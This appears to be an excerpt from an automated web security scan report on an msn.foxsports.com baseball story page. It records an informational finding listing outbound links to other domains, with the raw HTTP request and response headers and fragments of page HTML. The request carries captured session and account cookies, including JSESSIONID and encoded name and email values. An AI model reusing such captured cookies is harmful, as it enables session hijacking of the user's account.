<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsohio.com/01/03/11/Brewers-to-be-top-challenge-to-Reds-in-2/landing_reds.html?blockID=383908&amp;feedID=3724' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Big cheese');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Big cheese') });location.href=this.href;">
<div id="blurb_4" align="left" class="blurb">
...[SNIP]...
<!-- MLB - Story Page Promo -->

<a href="http://www.whatifsports.com/x.asp?r=678106&u=mlb-l">Play SimLeague Baseball ... Where Baseball History Comes Alive</a>
...[SNIP]...
<div class="fs-tune-in">

   
           <a href="http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8#ls=1"><img src="http://static.foxsports.com/content/fscom/img/2010/12/14/300x90_20101214192718571_0_0.JPG" alt=""/>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=9998e412-41ca-4568-90f0-53fed84d09dd&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=9998e412-41ca-4568-90f0-53fed84d09dd&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=4c0c6cac-d496-48ce-988a-92aec83dcb3f&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=4c0c6cac-d496-48ce-988a-92aec83dcb3f&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=dc932b39-3e36-45d0-ad4c-2698ef92d0f5&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=dc932b39-3e36-45d0-ad4c-2698ef92d0f5&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=89116f56-239a-418d-ac74-f8ca6c430be0&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=89116f56-239a-418d-ac74-f8ca6c430be0&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=4451c7ef-2554-469a-b7df-a89383f35fe3&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=4451c7ef-2554-469a-b7df-a89383f35fe3&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...


   
<a href="http://mlbbuzz.yardbarker.com/blog/mlbbuzz/soriano_is_no_1_free_agent_available_who_wants_him/3924488" title="Buzz: Soriano is best free agent left, but who wants him?">Buzz: Soriano is best free agent left, but who wants him?</a>
...[SNIP]...


   
        <a href="http://mlbbuzz.yardbarker.com/blog/mlbbuzz/soriano_is_no_1_free_agent_available_who_wants_him/3924488" title="Buzz: Soriano is best free agent left, but who wants him?"></a>
...[SNIP]...
<div class="fs-page-banner-sliver">

   
           <a href="http://foxsports.seenon.com/?v=fox-sports_mlb&amp;ecid=PRF-SM-510012&amp;PA=FoxSportsWSChampsGiants_300X90 "><img src="http://static.foxsports.com/content/fscom/img/2010/11/01/world_series_300x90_01_20101101222146_0_0.JPG" alt=""/>
...[SNIP]...
<div class="body">
<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://www.bing.com/news/search?q=elizabeth+edwards+will&go=&form=QBNR&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="DUI charge for Jaime Pressly" href="http://specials.msn.com/A-List/Entertainment/DUI-charge-for-Pressly.aspx?cp-documentid=27141923&ocid=xnetr4-3">DUI charge for Jaime Pressly</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.14. http://msn.foxsports.com/mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611?gt1=39002 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 234107
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Date: Sat, 08 Jan 2011 00:59:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.msn.com/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsohio.com/01/03/11/Brewers-to-be-top-challenge-to-Reds-in-2/landing_reds.html?blockID=383908&amp;feedID=3724' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Big cheese');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Big cheese') });location.href=this.href;">
<div id="blurb_4" align="left" class="blurb">
...[SNIP]...
<!-- MLB - Story Page Promo -->

<a href="http://www.whatifsports.com/x.asp?r=678106&u=mlb-l">Play SimLeague Baseball ... Where Baseball History Comes Alive</a>
...[SNIP]...
<div class="fs-tune-in">

   
           <a href="http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8#ls=1"><img src="http://static.foxsports.com/content/fscom/img/2010/12/14/300x90_20101214192718571_0_0.JPG" alt=""/>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=9998e412-41ca-4568-90f0-53fed84d09dd&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=9998e412-41ca-4568-90f0-53fed84d09dd&amp;w=136&amp;h=102" height="69" width="92" /></a>
